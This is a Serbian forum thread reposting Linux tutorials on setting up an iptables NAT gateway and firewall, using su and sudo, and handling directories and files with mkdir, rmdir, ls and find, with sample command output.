    <M> Connection state matchsupport
    <M> Connection tracking match support
    <M> Full NAT
    <M> MASQUERADE target support
    ~~
    # make && make modules install

    Ne zaboravite da konfiguriste vas botloader.


    3.Iptables i konfiguracija servera

    3.1 Instalacija
    Vi mozete da skinete iptables ovako.Ako vec posedujete neku distribuciju sa sistemom paketa (RedHat,Debian,Mandrake), koristite paket koji je stigao sa vasom distribucijom.


    # tar zxvf iptales*tar.gz
    # cd iptales*
    # make KERNEL_DIR=/put/do_vaseg/kernela
    # make install KERNEL DIR=/put/do_vaseg/kernela

    3.2 Konfiguracija

    Prvo moramo reci kernelu da aktivira transmisiju paketa IP.

    #echo "1" > /proc/sys/net/ipv4/ip_forward

    Zatim kreirajte jedno pravilo koristeci iptables za autorizaciju transmisije paketa IP.

    # iptables -t nat -A POSTROUTING -d !192.168.0.0/24 -j ACCEPT

    Zamenite "192.168.0.0" sa adresom vase mreze.

    3.2.2 Firewall
    Sada cemo da izvrsimo zastiti naseg premoscavanja i klijenata na unutrasnjoj mrezi.

    # iptables -P INPUT DROP
    # iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    # iptables -P FORWARD DROP
    # iptables -A FORWARD -s 192.168.0.0/24 -j ACCEPT
    # iptables -A FORWARD -s !192.168.0.0/24 -m state -state \> ESTABLISHED,RELATED -j ACCEPT

     

    4.Konfiguracija klijenata.

    4.1 Linux

    Proceduara za konfiguraciju klijenata Linux.

    # route add default gw <IP_PASSERELLE>
    # echo "nameserver <DNS_PROVIDER>" > /etc/resolv.conf

     

    4.2 Windows

    Procedura za konfiguraciju Windowsa klijenata.

    Start/Settings/Control Panel

    Kada je otvoren Kontrolni centar.

    Network and Internet Connections/Network Connections

    Desna strana misa ,properties na vasu lokalnu mrezu.

    Selektuj te Interenet Protokol(TCP/IP)

    Klikni te na properties.

    U opciju Default Gateway ubaci te adresu vaseg servera(prolaz,premoscavanje)

    U opciju Preffered DNS server ubacite adresu vaseg provajdera.

    Izvor: Tim 1o1
  • IP sačuvana
    social share
    Pogledaj profil WWW
     
    Prijava na forum:
    Ime:
    Lozinka:
    Zelim biti prijavljen:
    Trajanje:
    Registruj nalog:
    Ime:
    Lozinka:
    Ponovi Lozinku:
    E-mail:
    Supervizor foruma
    Legenda foruma


    Violence solves everything

    Zodijak Aquarius
    Pol Muškarac
    Poruke 33826
    Zastava Srbija
    OS
    Windows XP
    Browser
    Mozilla K-Meleon 1.02
    mob
    LG Nexus 5
    Komande SU i SUDO





     
    Kako postati root korisnik

    Kako se postaje root? U ovoj sekciji navedene su najcesce tehnike.
    su [korisnicko ime]
    Ako ste ulogovani preko sopstvenog korisnickog naloga, morate upotrebiti su komandu za preuzimanje root privilegija. Su komanda omogucava pokretanje novog shella u kome je Vase korisni~ko i grupno ime zamenjeno privremenim imenom koje navedete. Vazno je napomenuti da iako izgleda kako "postajete" root, Vi ustvari samo koristite drugi korisnicki i grupni identitet.
    Vas identitet je poznat sistemu; Vasim postupcima se itekako moze uci u trag. Komanda za
    prelazenje u root rezim je:
    $ su
    Koriscenje komande bez navodenja korisnickog imena podrazimeva root. Bice Vam zatrazena root lozinka i moracete se dokazati da bi Vam bio dat root pristup. Ako ne uspete, poruka o Vasem pokusaju bice poslata root korisniku. Ako se uspesno prijavite, zadrzacete svoje korsnicko okruzenje ali cete imati pristup direktorijumima u vlasnistvu root korisnika, bice Vam dozvoljeno da izvrsavate fajlove koje obican korisnik ne moze, da pravite fajlove u root direktorijumima i jos mnogo toga. Vasa putanja (PATH) ce ostati ista ona koja je bila sa normalnim nalogom, tako da mnoge opasnije komande nece biti dostupne sem ako im ne navedete punu putanju.

    su - [korisnicko ime]
    Dodavanje - parametra pokrece root shell i kome se dodatno podrazumeva i root okruzenje.
    Komanda za ovo bi bila:
    $ su -
    Bice Vam zatrazena root lozinka, a ako ne uspete da se prijavite ostacete u svom korinickom rezimu s'tim sto ce poruka o neuspelom pokusaju biti poslata root korisniku. Ako se pak uspesno prijavite, radni direktorijum bice Vam promenjen u root direktorijum. Od ovog trenutka pa na dalje ste root, mada Vam se identitet i dalje zna.


    Pokretanje X sesije iz root naloga
    Ako Vasa mreza koristi X Windows Sistem GUI interfejs, mozete pokrenuti citavu X sesiju prelazeci u root nalog i startujuci X. Sve sto uradite u toj sesiji bice ucinjeno kao da ste se ulogovali kao root u prvobitnom login promptu iako ce, opet, Vas pravi identitet biti zabelezen. Lako je zaboraviti da ste preuzeli privilegije glavnog korisnika pa ovoj sesiji treba
    pristupiti sa posebnom paznjom. Jedan od nacina da ne zaboravite da ste startovali X kao root je da koristite sasvim drugacije X okruzenje za root korisnika u odnosu na ostale. Mozete naciniti pozadinu root X sesije crvenom ili zutom da biste oznacili da je sesiju pokrenuo glavni korisnik.
    Zbog potencijalnih katastrofa koje mogu biti izazvane vrsenjem posla koriscenjem glavnog naloga, bolje je koristiti normalan korisnicki nalog za logovanje i startovanje X sesije. Kada jednom startujete X, mozete pokrenuti terminal i pomocu su naredbe "become" root u okviru terminala, i zatim obaviti predvidene poslove. Cim zavrsite, izadite iz root rezima i nastavite kao normalan korisnik. Ovaj metod je daleko manje opasan.

    sudo
    sudo (sto znaci "superuser do"-uradi iz rezima glavnog korisnika) je Linux komanda koju administratori cesto koriste da privremeno dodele "superuser" ili root privilegije korisniku ili grupi korisnika da bi im omogucili izvrsavanje odredenih operacija koje im inace ne bi bile dozvoljene.
    sudo vodi evidenciju o svojoj upotrebi, belezeci ko ga je koristio i sta je uradeno. Takode salje e-mail glavnom korisniku ako neko ko nema odgovaraju}e privilegije pokusa da pozove sudo komandu. Kada se korisnik prijavi, sudo omogucava trazenu privilegiju u trajanju od pet minuta(ovo se moze menjati), te svaka izdata komanda dobija svojih pet minuta. Komanda izgleda
    ovako:

    $ sudo shutdown -r now
    sudo prvo proverava korisnikov identitet trazenjem lozinke. Zatim konsultuje /etc/sudoers fajl da bi utvrdio da li korisnik ima dozvolu da izvrsi naredbu kao navedeni korisnik, ili kao root ako korisnik nije naveden. Fajl /etc/sudoers izgleda ovako:
    # sudoers file.
    #
    # This file MUST be edited with the 'visudo' command as root.
    #
    # See the sudoers man page for the details on how to write the sudoers file.
    #
    # Host alias specification
    # User alias specification
    # Cmnd alias specification
    # User privilege specification
    root ALL=(ALL) ALL
    someuser ALL=(ALL) ALL
    Ako je korisnik naveden u /etc/sudoers fajlu, trazi se lozinka. Ako korisnik uspe da potvrdi svoj identitet odgovarajucom lozinkom, navedena operacija se izvrsava i petominutni tajmer se postavlja. Tokom tih pet minuta prijavljeni korisnik moze izvrsavati sudo komandu bez ponovnog unosenja lozinke.
    sudo je alat od velikog znacaja. Zahvaljujuci njemu, mozete odredenim korisnicima ili administrativnom osoblju omoguciti da obave neke poslove visokog nivoa ne dajuci im root lozinku.(Naravno, ovo cete raditi samo onda kada korist od pustanja korisnika da obavi neki posao nadvladava potencijalni rizik. Korisnik mora biti ne samo pouzdan vec i tehnicki kompetentan.)
    Ovaj alat je dostupan u mnogim standardnim distribucijama Linux-a i vecini verzija Unix-a.
    Za detaljniji opis sudo naredbe posetite ovaj sajt.

    Izvor: Tim 1o1
    « Poslednja izmena: 25. Mar 2007, 10:30:47 od Crowz »
    IP sačuvana
    social share
    Pogledaj profil WWW
     
    Prijava na forum:
    Ime:
    Lozinka:
    Zelim biti prijavljen:
    Trajanje:
    Registruj nalog:
    Ime:
    Lozinka:
    Ponovi Lozinku:
    E-mail:
    Supervizor foruma
    Legenda foruma


    Violence solves everything

    Zodijak Aquarius
    Pol Muškarac
    Poruke 33826
    Zastava Srbija
    OS
    Windows XP
    Browser
    Mozilla K-Meleon 1.02
    mob
    LG Nexus 5
    Komande za rukovanje direktorijumom




       
    Kada ste kao korisnik postavljeni na UNIX operativni sistem, obicno ste tako postavljeni da je Vas home direktorijum /u/username. Za potrebe organizovanja svojih fajlova i sami mozete da kreirate direktorijume koji odgovaraju Vasim potrebama. Ovde cemo opisati komande za kreiranje i uklanjanje direktorijuma.

    mkdir

    Za kreiranje direktorijuma koristi se komanda mkdir. Ona prihvata da se istovremeno navede vise imena direktorijuma za kreiranje. Kao sto je to bio slucaj sa fajlovima, i za kreiranje direktorijuma koriste se relativno i apsolutno ime puta. Da biste mogli da kreirate direktorijum, morate da imate dozvolu za pisanje u njegov "roditeljski" direktorijum. UNIX koristi tekucu postavku dozvola da postavi dozvolu za direktorijum.
    U sledecoj listi navedeni su indikatori koji mogu da se koriste sa mkdir komandom:
    -p da se svi direktorijumi kreiraju u imenu puta specificiranog direktorijuma, ukoliko ne postoje
    -m dozvola koja se specificira dozvola za direktorijum koji treba da se kreira.

    Primeri

    Ako je Vas tekuci direktorijum /u/testuser
    mkdir temp
    kreirace direktorijum po imenu temp, koji ce se nalaziti u direktorijumu /u/testuser, cije je apsolutno ime puta /u/testuser/temp.
    mkdir /u/testuser/temp
    imate isto dejstvo kao i prethodna komanda.
    mkdir ../temp
    moze da se upotrebi da se kreira direktorijum /u/temp. Ovde smo kao deo relativnog imena puta koristili .. (dve uzastopne tacke), da naznacimo da ce se direktorijum temp kreirati u direktorijumu koji se nalazi za jedan nivo vise, odnosno u direktorijumu /u.
    Koristite komandu da kreirate testdirl i testdir2 u tekucem direktorijumu:
    mkdir testdirl /u/testuser/temp/testdir2
    Ovom komandom kreirace se testdirl u tekucem direktorijumu i testdir2 u /u/testuserltemp (pod pretpostavkom da postoji). U navedenom primeru testdiri koristi relativno, a /u/testuserltemp/testdir2 apsolutno ime puta.
    Ukoliko direktorijum testdir vec postoji, kada pokusate da ga ponovo kreirate, dobicete poruku slicnu sledecoj:
    mkdir: cannot create testdir.
    testdir: File exists
    Ako hocete da u okviru tekuceg direktorijuma kreirate direktorijum testdir i istovremeno mu dodelite dozvolu za pristup 770, izvrsite komandu:
    mkdir -m 770 testdir
    Ako hocete da kreirate direktorijum testdir u tekucem direktorijumu i poddirektorijum temp u direktorijumu testdir, kreirajte ih jednom komandom na sledeci nain:
    mkdir -p testdir/temp rmdir
    Kada vise nemate nameru da koristite neki direktorijum, ili hodete da ga uklonite, jer nemate slobodnog prostora, upotrebite komandu rmdir. Direktorijum mozete da uklonite samo ako je prazan, odnosno pod uslovom da su svi fajlovi i poddirektorijumi koji se u njemu nalaze prethodno uklonjeni. Kao argumente za rmdir komandu mozete da navedete vise imena direktorijuma. Da bi Vam bilo dozvoljeno da uklonite direktorijum, morate da imate dozvolu za pisanje u "roditeljski" direktorijum.
    Sledeci indikator moze da se koristi sa rmdir komandom:
    - p za uklanjanje svih direktorijuma koji se nalaze u specificiranom imenu puta.
    Primeri
    Ako Vas tekuci direktorijum /u/testuser sadrzi poddirektorijum temp, za uklanjanje tog poddirektorijuma koristite komandu:
    rmdir temp
    Ukoliko direktorijum temp nije prazan, dobicete poruku slicnu sledecoj:
    rmdir: Directory temp is not empty.
    Pretpostavimo da se nalazite u direktorijumu /u/testuser, koji sadrzi poddirektorijum testdir, pri cemu poddirektorijum testdir sadrzi poddirektorijum temp. da biste uklonili oba, izvrsite komandu (pod uslovom da su uklo-njeni svi fajlovi i direktorijumi koji se nalaze u okviru njih):
    rmdir -p testdir/temp

    Komande za dobijanje informacija o fajlovima

    U UNIX-u svaki fajl, ili direktorijum, ima nekoliko pridruzenih atributa. Postoji nekoliko komandi za trazenje informacija o ovim atributima, pomocu kojih atributi mogu da se obraduju.
    ls
    Komanda ls moze da se koristi za postavljanje pitanja o razlicitim atributima jednog, ili vise fajlova, ili direktorijuma. Morate da imate dozvolu za citanje direktorijuma da biste mogli da koristite ls komandu za taj direktorijum i fajlove u njemu. Komanda is generise izlaz na standardnom izlazu, koji moze da se preusmeri u fajl, pomocu UNIX-ovog operatora > za preusmerenje.
    U komandi ls mozete da navedete ime jednog, ili vise fajlova, ili direktorijuma. imena fajlova i direktorijuma su opciona. Ukoliko ih ne navedete, UNIX ce obraditi direktorijum.PO defaultu se lista fajlova u direktorijumu sortira po imenu fajla. Redosled sortiranja mozete da izmenite, upotrebom indikatora, o kojima ce kasnije biti reci.
    Trebalo bi da imate u vidu da fajlovi cija imena pocinju . (tackom) nece biti obradeni, ukoliko u ls komandi ne upotrebite -a indikator. To znaci da upisi . (jedna tacka) i .. (dve uzastopne tacke) nece biti obradeni po defaultu.
    Navodimo listu nekih indikatora koji mogu da se koriste sa ls komandom:
    - A za listanje svih upisa u direktorijum, izuzev . (jedna tacka) i .. (dve uzastopne tacke)
    - a za listanje svih upisa u direktorijum, ukljucujuci i skrivene fajlove - imena fajlova pocinju . (tackom).
    - b za prikazivanje karaktera koji ne mogu da se ispisu; oni se prikazuju oktalnim (nnn) sistemom oznacavanja
    - c za koriscenje vremena poslednje modifikacije i-cvora; kada se koristi sa -t indikatorom, izlaz je sortiran po vremenu poslednje modifikacije i-cvora, a kada se koristi sa -1 indikatorom, prikazano vreme predstavlja poslednje vreme modifikacije i-cvora (ovaj indikator mora da se koristi sa -t ili -1 indikatorom)
    - C za vertikalno sortiranje izlaza za format sa vise kolona; ovo je default nacin kada se izlaz upucuje na terminal
    - d da se prikazu samo informacije koje se odnose na navedeni direktorijum; po defaultu se prikazuju i informacije o fajlovima i direktorijumima unutar tog direktorijuma
    - e da se za svaki navedeni fajl, ili direktorijum prikazu sledece informacije:
    1. dozvola pridruzena fajlovima i direktorijumima
    2. broj linkova
    3. vlasnik
    4. grupa
    5. velicina (u bajtovima)
    6. vreme poslednje modifikacije
    7. ime svakog fajla. Ukoliko se radi o posebnom fajlu, polje za velicinu sadrzi brojeve glavnog (major) i podredenog (minor) uredaja. Ako je fajl simbolicki link, ime puta za'linkovan-sa fajl ispisuje se tako da mu prethodi -> (znak minus iza koga sledi znak'vece od'). Prikazuju se atributi simbolickog linka.
    - f za ispisivanje svih imena za svaki direktorijum naveden u parametru za direktorijum; ovaj indikator iskljucuje indikatore -1, -t, - s, - r i ukljucuje indikator -a (redosled ispisivanja je redosled po kome se upisi pojavljuju u direktorijumu).
    - F da se ispred razlicitih tipova fajlova stave specijalni karakteri, na sledeci nacin:
    1. / (kosa crta) posle svakog direktorijuma
    2. * (asterisk) ako je fajl izvrsni fajl
    3. =(znak jednako) ako je fajl socket
    4. ; (znak za pipe) ako je fajl FIFO fajl
    5. @ (znak at) za simbolicki link
    - g prikazuje sledece informacije o fajlovima i direktorijumima:
    1. dozvola
    2. broj linkova
    3. grupa
    4. velicina (u bajtovima)
    5. vreme poslednje modifikacije
    - i da se za svaki fajl prikaze broj i-cvora u prvoj koloni izvestaja
    - l da se prikazu sledece informacije o navedenim fajlovima i direktorijumima:
    1. dozvola
    2. broj linkova
    3. vlasnik
    4. grupa
    5. velicina (u bajtovima)
    6. vreme poslednje modifikacije
    - m da se izlaz prikaze u formatu sa zarezima
    - n da se za navedene fajlove i direktorijume prikazu sledece informacije:
    1. dozvola
    2. broj linkova
    3. id vlasnika
    4. id grupe
    5. velicina (u bajtovima)
    6. vreme poslednje modifikacije
    - o da se za navedene fajlove i direktorijume prikazu sledece informacije:
    1. dozvola
    2. broj linkova
    3. id vlasnika
    4. velicina (u bajtovima)
    5. vreme poslednje modifikacije
    - p da se stavi kosa crta (/) iza svakog imena direktorijuma
    - q da se prikazu karakteri koji se ne vide, a nalaze se u imenima fajlova, kao sto je ? (znak.pitanja)
    - r da se obrne redosled sortiranja ukoliko lista treba da se prikaze po redosledu imena, prikazace se po obrnutom redosledu imena, a ako treba da se prikaze po redosledu opadanja vremena (koriscenjem -t indikatora), gde se prvo prikazuje poslednje vreme, prikazace se po rastucem redosledu vremena, gde ce se prvo prikazati "najstarije" vreme
    - R da se rekurzivno izlistaju svi poddirektorijumi koji se nalaze u navedenom direktorijumu
    - s da se prikaze velicina fajlova i direktorijuma u kilobajtima
    - t da se upisi sortiraju po vremenu poslednje modifikacije (prvo se prikazuje poslednji), umesto po imenu
    - u da se koristi vreme poslednjeg pristupa, umesto vremena poslednje modifikacije; ako se koristi sa -1, prikazuje se vreme poslednjeg pristupa, umesto vremena poslednje modifikacije; a ako se koristi sa -t, izlaz se sortira po vremenu poslednjeg pristupa, umesto po vremenu poslednje modifikacije (ovaj indikator mora da se koristi sa indikatorima -1 i -t)
    - x za horizontalno sortiranje izlaza u formatu sa vise kolona
    - 1 da se u izlazu prikaze jedan upis po redu.
    Informacije koje o dozvolama prikazuje ls komanda, u slucaju kada se koriste izvesni indikatori, kao sto je -1, sastoje se od 10 karaktera. Njihov detaljan opis je sledeci:

    Byte 1: d oznacava direktorijum, b poseban blok fajl, c poseban karakter fajl, 1 simbolicki link, p oznacava poseban fajl tipa prvi-ulazi, prvi-izlazi (FIFO), s lokalni socket, i obican fajl (na primer, fajl koji sadrzi tekst)

    Byte 2: r - ako je vlasniku dodeljena dozvola za Citanje, - (crta) - ako vlasniku nije dodeljena dozvola za citanje

    Byte3: w - ako je vlasniku dodeljena dozvola za pisanje, - (crta) - ako vlasniku nije dodeljena dozvola za pisanje

    Byte4: x - ako je vlasniku dodeljena dozvola za izvrsavanje, - (crta) - ako vlasniku nije dodeljena dozvola za izvrsavanje, s - ako fajl ima set-user-ID nacin (mode)

    Byte5: r - ako je grupi dodeljena dozvola za citanje, - (crta) - ako grupi nije dodeljena dozvola za citanje

    Byte6: w - ako je grupi dodeljena dozvola za pisanje, - (crta) - ako grupi nije dodeljena dozvola za pisanje

    Byte7: x - ako je grupi dodeljena dozvola za izvrsavanje, - (crta) - ako grupi nije dodeljena dozvola za izvrsavanje, s - ako fajl ima setgroup-ID nain (mode).

    Byte8: r - ako je ostalima dodeljena dozvola za citanje, - (crta) - ako ostalima nije dodeljena dozvola za citanje

    Byte9: w - ako je ostalima dodeljena dozvola za pisanje, - (crta) - ako ostalima nije dodeljena dozvola za pisanje

    Bytel0: x - ako je ostalima dodeljena dozvola za izvrgavanje, - (crta) - ako ostalima nije dodeljena dozvola za izvrsavanje.

    Kada se radi o fajlu, dozvola za izvrsavanje znaci da je fajl izvrsljiv. Medutim, kada se radi o direktorijumu, dozvola za izvrsavanje znaci da mozete da pretraiujete navedeni direktorijum, tragajuci za jednim, ili vise fajlova.
    Primera
    Pretpostavimo da su sledeci fajlovi i direktorijumi prisutni u tekucem direktorijumu:dot1, test1, test2, test3 i test4. Takode, pretpostavimo da je test2 direktorijum.
    Najjednostavniji oblik ls komande moze da se upotrebi da bi se dobila lista fajlova i direktorijuma, koji se nalaze u tekucem direktorijumu:

    ls
    testl test2 test3 test4 test5

    U ovoj listi ne prikazuje se upis u direktorijum . dotl, zato sto je fajl . dot1 skriveni fajl. Da bi se prikazali svi upisi, ukljucujuci i skrivene fajlove, pozovite komandu:

    ls -a
    . .. .dot1 test1 test2 test3 test4 test5

    Gornja lista ne prikazuje informacije o upisima. Da biste dobili detaljnu listu svih fajlova i direktorijuma, pozovite komandu sa -a indikatorom:

    ls -la

    total 56
    drwxrwx--- 3 testuser author 3072 Nov 24 17:35 .
    drwxr-xr-x 36 root system 2048 Nov 23 19:51 ..
    -rw-r--r-- 1 testuser author 0 Nov 24 14:54 .dotl
    -rw-r--r-- 1 testuser author 10 Nov 24 17:36 testl
    drwxr-xr-x 2 testuser author 512 Nov 24 17:32 test2
    -rw-r--r-- 1 testuser author 0 Nov 24 14:58 test3
    -rw-r--r-- 1 testuser author 0 Nov 24 17:33 test4
    -rw-r--r-- 1 testuser author 11885 Nov 24 11:50 test5

    Koriscenje indikatora -a ima za posledicu prikazivanje dva posebna upisa, koji su prisutni u svim direktorijumima:. (jedna tacka), kojom se oznacava navedeni direktorijum, i .. (dve uzastopne tacke), kojima se oznacava "roditeljski" direktorijum.
    Ukoliko hocete da imate samo listu direktorijuma, pozovite komandu sa -d indikatorom:

    ls -ald
    drwxrwx--- 3 testuser author 3072 Nov 24 17:15 .

    Kao sto ste mogli da vidite u prethodnim primerima, fajlovi i direktorijumi u listi poredani su po imenu. Ukoliko hocete da dobijete listu upisa u direktorijum, koji su poredani po vremenu poslednje modifikacije, da biste videli sta je bilo poslednje na cemu ste radili, pozovite komandu sa -t indikatorom:

    ls -lat
    total 56
    drwxrwx--- 3 testuser author 3072 Nov 24 17:37 .
    -rw-r--r-- 1 testuser author 10 Nov 24 17:36 testl
    -rw-r--r-- 1 testuser author 0 Nov 24 17:33 test4
    drwxr-xr-x 2 testuser author 512 Nov 24 17:32 test2
    -rw-r--r-- 1 testuser author 0 Nov 24 14:58 test3
    -rw-r--r-- 1 testuser author 0 Nov 24 14:54 .dot1
    -rw-r--r-- 1 testuser author 11885 Nov 24 11:50 test5
    drwxr-xr-x 36 root system 2048 Nov 23 19:51 ..

    Sve do sada nismo u ls komandi naznacili ime fajla, ili direktorijuma. Ukoliko hocete da trazite sve upise cije ime pocinje sa test, na sledeci nacin navedite test* za ime upisa:

    ls -la test*
    -rw-r.-r-- 1 testuser author 10 Nov 24 17:36 testl
    -rw-r.-r-. 1 testuser author 0 Nov 24 14:58 test3
    -rw-r--r-- 1 testuser author 0 Nov 24 17:33 test4
    -rw-r--r-- 1 testuser author 11885 Nov 24 11:50 tests

    test2:
    total 16
    drwxr-xr-x 2 testuser author 512 Nov 24 17:32 .
    drwxrwx--- 3 testuser author 3072 Nov 24 17:41 ..
    -rw-r--r-- 1 testuser author 0 Nov 24 17:45 test2l
    -rw-r--r-- 1 testuser author 0 Nov 24 14:58 test22

    Mozete da zapazite da upisi . (jedna tacka), .. (dve uzastopne tacke) i .dotl ovde nisu prikazani, zbog toga sto dzoker znak * (asterisk) ne odgovara karakteru . (tacka).
    Ako hocete da dobijete listu u kojoj su fajlovi i direktorijumi iz tekuceg direktorijuma odvojeni zarezima, pozovite komandu sa -m indikatorom:

    ls -am
    dotl, testl, test2, test3, test4, test5

    Ukoliko hocete da dobijete listu upisa u kojima ce direktorijumi biti oznaceni sa / (kosom crtom), izvrsite komandu sa -p indikatorom:

    ls -ap
    / testl test4
    / test2/ test5
    .dotl test3

    Izlaz slican ovom, ali sa vise informacija, moze da se dobije kada se koristi -F indikator. Koriscenjem indikatora -F, dobija se prikaz u kome su oznaceni izvrsni fajlovi, simbolicki linkovi i tako dalje.
    Ako hocete da dobijete listu upisa poredanu po obrnutom redosledu imena, pozovite komandu sa -r indikatorom:

    ls -rla
    total 56
    -rw-r--r-- 1 testuser author 11885 Nov 24 11:50 test5
    -rw-r--r-- 1 testuser author 0 Nov 24 17:33 test4
    -rw-r--r-- 1 testuser author 0 Nov 24 14:58 test3
    drwxr-xr-x 2 testuser author 512 Nov 24 17:32 test2
    -rw-r--r-- 1 testuser author 10 Nov 24 17:36 testl
    -rw-r--r-- 1 testuser author 0 Nov 24 14:54 .dotl
    drwxr-xr-x 36 root system 2048 Nov 23 19:51 ..
    drwxrwx--- 3 testuser author 3072 Nov 24 18:00 .

    Da biste dobili listu svih fajlova koji se nalaze u tekucem direktorijumu, ukljucujuci i fajlove koji se nalaze u svim poddirektorijumima, pozovite komandu sa -R indikatorom:

    ls -lR
    total 40
    -rw-r--r-- 1 testuser author 10 Nov 24 17:36 testl
    drwxr-xr-x 2 testuser author 512 Nov 24 17:32 test2
    -rw-r--r-- 1 testuser author 0 Nov 24 14:58 testa
    -rw-r--r-- 1 testuser author 0 Nov 24 17:33 test4
    -rw-r--r-- 1 testuser author 11885 Nov 24 11:50 test5
    ./test2:
    total 0
    -rw-r--r-- 1 testuser author 0 Nov 24 17:45 test2l
    -rw-r--r-- 1 testuser author 0 Nov 24 14:58 test22

    Sledeci primeri prikazuju ls komandu sa i bez -u indikatora. Lista koja se dobija bez -u indikatora prikazuje vreme poslednje modifikacije. Lista koja se dobija pomocu -u indikatora prikazuje vreme poslednjeg pristupa.

    ls -lu
    total 40
    -rw-r--r-- 1 testuser author 10 Nov 24 17:34 testl
    drwxr-xr-x 2 testuser author 512 Nov 24 18:19 test2
    -rw-r--r-- 1 testuser author 0 Nov 24 14:58 test3
    -rw-r--r-- 1 testuser author 0 Nov 24 17:33 test4
    -rw-r--r-- 1 testuser author 11885 Nov 24 17:56 tests ls -1
    total 40
    -rw-r--r-- 1 testuser author 10 Nov 24 17:36 testl
    drwxr-xr-x 2 testuser author 512 Nov 24 17:32 test2
    -rw-r--r-- 1 testuser author 0 Nov 24 14:58 test3
    -rw-r--r-- 1 testuser author 0 Nov 24 17:33 test4
    -rw-r--r-- 1 testuser author 11885 Nov 24 11:50 tests


    find
    Ako niste sigurni gde se nalazi odredeni fajl, za pretrazivanje upotrebite komandu find. Ona Vam pruza fleksibilnost u traganju, omogucavajuci Vam da tragate za fajlom po razlicitim atributima, kao sto su ime, dozvola i slicno. Pored toga, find komanda omogucava da izvrsavate odredene komande nad fajlovima koji su pronadeni kao rezultat pretraiivanja.
    Format find komande je sledeci:
    find directory-name search-expression
    Ime direktorijuma moze da bude puno ime puta, ili . (jedna tacka) za tekuci direktorijum. U sledecoj listi prikazani su termini koji mogu da se koriste sa find komandom:

    -name filename da se specificira ime fajla (ukljucujuci i dzoker znake), koje ce se koristiti u pretraizivanju. Takode, mozete da koristite opseg kao deo dzoker znaka. Ako hocete da koristite karaktere, koji predstavljaju dzoker znake, morate da ih specificirate u okviru znaka navoda. Na primer, "test*" ce pronaci sve fajlove koji pocinju sa test. Ako specificirate "test[1-2]", pronaci cete fajlove koji pocinju sa test i imaju 1, ili 2 kao poslednje karaktere, kao sto su test1 i test2.

    - size Number da se specificira velicina fajla, koja se koristi za pretrazivanje. Velicina fajla specificira se u blokovima. Da biste specificirali da trazite fajlove cija je velicina manja od specificirane velicine, koristite - (znak minus) ispred navedene velicine. Da biste specificirali da trazite fajlove cija je velicina veca od specificirane velicine, koristite + (znak plus) ispred navedene velicine. Na primer, -size 5 traze fajlove cija velicina iznosi pet blokova (velicina fajla kod uporedenja uvek se zaokruzuje na sledeéci najblizi blok), -size -5 trazice fajlove cija je velicina manja ili jednaka pet blokova, -size +5 trazice fajlove cija je velicina veca od pet blokova.

    -size Numberc da se specificira velicina fajla, koja se koristi za pretraiivanje. Drugim recima, stavite karakter c na kraj broja. Sada je velicina fajla specificirana u bajtovima. Da biste specificirali da trazite fajlove cija je velicina manja od navedene velicine, koristite - (znak minus) ispred navedene velicine fajla. Da biste specificirali da trazite fajlove cija je velicina veca od navedene velicine, koristite + (znak plus) ispred velicine fajla. Na primer, -size 50c trazice fajlove cija velicina iznosi 50 bajtova, -size -50c trazice fajlove cija je velicina manja, ili jednaka 50 bajtova, - size +50c trazice fajlove cija je velicina veca od 50 bajtova.

    -prune da se ogranici komanda find da rekurzivno ne obraduje direktorijume; po default-u, find rekurzivno obraduje sve direktorijume i poddirektorijume u navedenom direktorijumu

    atime number da se prilikom pretrazivanja traze fajlovi kojima je pristupano u specificiranom broju perioda od 24 sata. Broj perioda od 24 sata izracunava se dodavanjem broja 1 na specificirani broj; 0 oznacava poslednja 24 sata.

    -mtime number da se prilikom pretrazivanja traze fajlovi koji su bili modifikovani u specificiranom broju perioda od 24 sata. Broj perioda od 24 sata izracunava se dodavanjem broja 1 na specificirani broj; 0 oznacava poslednja 24 sata.

    -ctime number da se prilikom pretrazivanja traze fajlovi ciji je i-cvor bio modifikovan u specificiranom broju perioda od 24 sata. Broj perioda od 24 sata izracunava se dodavanjem broja 1 na specificirani broj; 0 oznacava poslednja 24 sata.

    -type filetype da se prilikom pretrazivanja traze fajlovi odredenog tipa. Mogu da se koriste tipovi koji se nalaze u sledecoj listi:
    b - posebni blok fajl
    c - posebni karakter fajl
    d - direktorijum
    f - regularni fajl
    1- simboli&ki link
    p - FIFO (imenovan pipe)
    s - socket

    -user da se prilikom pretrazivanja traze fajlovi ciji je vlasnik navedeno ime korisnika

    -perm permission da se prilikom pretrazivanja traze fajlovi sa specificiranom dozvolom, koja se navodi kao oktalni broj od tri cifre. Ukoliko specificiranoj dozvoli ne prethodi - (crta), medu dozvolama za fajlove trazi se ona koja je identicna navedenoj dozvoli. Ukoliko specificiranoj dozvoli prethodi crta, dozvola za fajl spaja se logickim "i" sa specificiranom dozvolom i medu fajlovima traze oni koji ispunjavaju taj uslov. Na primer, ako hocete da pretrazujete, trazeci fajlove ciji vlasnik ima dozvolu za citanje, koristite -perm -400.

    -newer filename da se prilikom pretrazivanja traze fajlovi cije je vreme modifikacije vece od vremena modifikacije specificiranog fajla

    -group groupname da se prilikom pretrazivanja traze fajlovi koji pripadaju specificiranoj grupi.

    -inum Number da se prilikom pretraiivanja traze fajlovi ciji je broj i-cvora jednak specificiranom broju i-cvora

    -links Number da se prilikom pretrazivanja traze fajlovi koji imaju specificirani broj linkova. Da biste naznacili da se pretrazivanje odnosi na broj linkova manji od navedenog broja linkova, koristite - (znak minus) ispred broja linkova. Ako hocete da se pretrazivanje odnosi na broj linkova koji je veci od naznacenog, koristite + (znak plus) ispred broja.
    -ls da se ime tekuceg puta ispise zajedno sa sledecim atributima:
    brojem i-cvora
    -velicinom u kilobajtima (1.024 bajta)
    -nacinom zagtite
    -brojem hard linkova
    -korisnikom
    -grupom
    -velicinom u bajtovima
    -vremenom modifikacije

    -exec command da se komanda pozove na izvrsavanje. Da bi se navedena komanda izvrsila nad fajlovima koji se nalaze u listi fajlova, pronadenih find komandom, koristite { } iza cega slede ; (backslash, iza koga sledi znak tacka - zarez).

    -ok command da se komanda pozove na izvrsavanje. Da bi se navedena komanda izvrsila nad fajlovima koji se nalaze u listi fajlova pronadenih find komandom, koristite { }, iza cega slede ; (backslash, iza koga sledi znak tacka - zarez). UNIX trazi potvrdu pre nego sto nastavi izvrsavanje ove komande.

    - print za ispisivanje izlaza cije je generisanje rezultat pretrazivanja.

    Ovi operatori mogu medusobno da se kombinuju, cime se omogucava da se formiraju slozeni kriterijumi za pretrazivanje. Na sledeci nacin mozete da kombinujete nekoliko operatora:
    -operator -a operator da se traze fajlovi koji zadovoljavaju oba navedena kriterijuma
